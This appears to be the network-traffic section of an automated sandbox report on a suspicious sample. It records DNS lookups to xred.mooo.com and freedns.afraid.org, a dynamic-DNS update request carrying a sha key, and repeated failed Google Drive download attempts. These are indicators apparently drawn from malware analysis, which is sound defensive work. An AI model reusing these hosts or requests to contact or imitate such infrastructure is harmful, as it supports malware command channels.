Source: global traffic; HTTP traffic detected:
    GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
    User-Agent: MyApp
    Host: freedns.afraid.org
    Cache-Control: no-cache
Source: global traffic; DNS traffic detected: DNS query: docs.google.com
Source: global traffic; DNS traffic detected: DNS query: xred.mooo.com
Source: global traffic; DNS traffic detected: DNS query: freedns.afraid.org
Source: global traffic; DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic; HTTP traffic detected:
    HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC6NJWRzAGzN6dk7Rk4Q0QhRvXdxRVKEpMmWNU-TskVxm1TNk1I3X8D7u4p65YTUVeg4
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:25 GMT
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-CTKQS5mfjll2Jmlgd_8V5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Length: 1652
    Server: UploadServer
    Set-Cookie: NID=520=GG50B5bNv6sgXACql__W2PXcKZPl7tvWh7yCyN5O4G1FTVXRl9DITtg7F0NDTb1C9t5S152i_ICLfAe1H2fxnTJ8JrEDVAVRPZae_sL_6AH5SaTjnPk2h4AqLCoE5njkS2pPKExFaP_qi_kRcBh1BP4swSFF2VSB0u2jDSWnNsXH-zRVFWAAOxkC; expires=Tue, 01-Jul-2025 10:25:25 GMT; path=/; domain=.google.com; HttpOnly
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC78WH2aQ4H0haM8uSur0MTXrEhLMcknkFGY4awX1-JEYYWodeMjpOk3e8ngSJPmgD0OContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:29 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-1hJselt7JyWs-IlT9xc4IA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC67ZWE3HbwZYYqmy-HkpddXX9XWeXrshRkh9nu22j3_7I_JBJyIlOpc6eiiSQQEpnGpCRfOFjsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:30 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-5uNVTAlXcFdEHk_x6A0qrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4qSo2eWnQVRGGSs6Nd4z5cyzrXMkCxLJ6jBB7LVu4A9e4A40V4f6VbAbscLz5-I1hvMU-T3WoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:30 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-UVVVf8XLAMoyvuA2LbwP4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6piQqX4YpAYSnGK5rmpf9m-AiYJzujFWjmJ5R0iXX-Iqrg4Gdojq1JH_FCsWMVcsIzGlPYdCgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:31 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-e1U2MPuRcfP1zzin763k-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5e2vE356ToewocaN3t2l_I36XsW71uHFHmBre1Hzxf4yI-4zSDBaQAhgIVPx7bU1T6Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:32 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Hg8rX6lgkU-loeZeSn9YQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7O_8nEjWJNdlLNBRnMeU0HqhuwwvBAPvnwCzWY937eobRlfBbBXOk1Adou5ymE5mXYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:33 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-e4Pt5PPV8v-pX8X7T0NJBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5hhvi7_59EzkaTic7-WNeViVn_GBQ7zNZNPjZi73WniYXacej0UiEaqHiLIAX6O0w6n9YSd-YContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:35 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-qE-R7FGhhX0v1n7xfM2l-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4pVFpQkvf6F1lnoeKm562fqYMq2R5x1eJ-M76LoHGQOfTsXGH0QqipvmbVMOUWcZMEYGXl1zMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:35 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-oeNJ12oSFSzqqjzP8VnfCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5CQOS6CqRfeUnv0GsHroGTZKWMzwvGwSq4i9iUCl5hIt9S9kBNrxNKP0ntknV85b38Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:36 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-DxIqZbV88PZzPTAOJL9OAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7Y7DTRfb37wmeygo-osyZHOQC6LdETDiKai0i-MnQRYumN4Y7ly3Rr01zS_bbNp35uContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:36 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-2Ma45EpewXIetwEGGQiNbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7DXWhOdjjGpH5Ee5m4wo3Ijp5Eb1wwTt2GJn2YbdCEDhw_h4yCTeVz8ZpDipIccCqIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:38 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-kbXeYQMNDWpQuSBDYTZssA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7DCxlNerWapFpc1sWBylio5fQTsLIyRTppP6zJDM6KOmmDhFN1fD74vrK87aKJ2ku1J60Q79MContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:39 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Na5BI9FdRkLEuNQ1IaNykw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5D8s9HxmvRkEX0pER7nT_KDVZ40S1TIcqBlNV8dh3kWmnCCoFV5Krjhsd0YLqZY7p2DTaQ6GAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:39 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-yoGInZjpuifgIy7IDqluTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7HLcXAnLhbSjbjNmiLiZhqJCAW3apfWCgKID1LuO7mF3_MvUaK-Kv2rckeaxxHGTNzContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:40 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-WuPte8BSiBUZM7b3U4OdDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6s-smCQ2SFdiS79T0-Ml63D3J7vPBoZHg5H51upU3KPsEyt0nZLwxm2HA-WKo_PEAnContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:40 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-hMGxaJ4cc4xrVKianJBeGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4P9dcb7zks9tzVGlzBslFDu6BY9eKd5ugppUK_SfkWdjlEfBfxKotPXYzIVfordHgIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:41 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-mFVecKSr9t1hr-4WwhYNCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC65jHHTHh9eGjuIguwqO6r9vMh8tKJyuafVV16hH_xhzg1rpKmMxk3ig1CSd65hA4fOEEDosaAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:42 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-i5yUbJkJkp540OPeLVqMnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6lEiPWnEutgnpaJ-M4i2D5Tj9vFe-mE9RkRX4dlnLgyXYbjCQc28rEzi2ZhwbVNLJolkFpow4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:25:43 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-s3x3kMhVWRMJKk_KoXwoiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
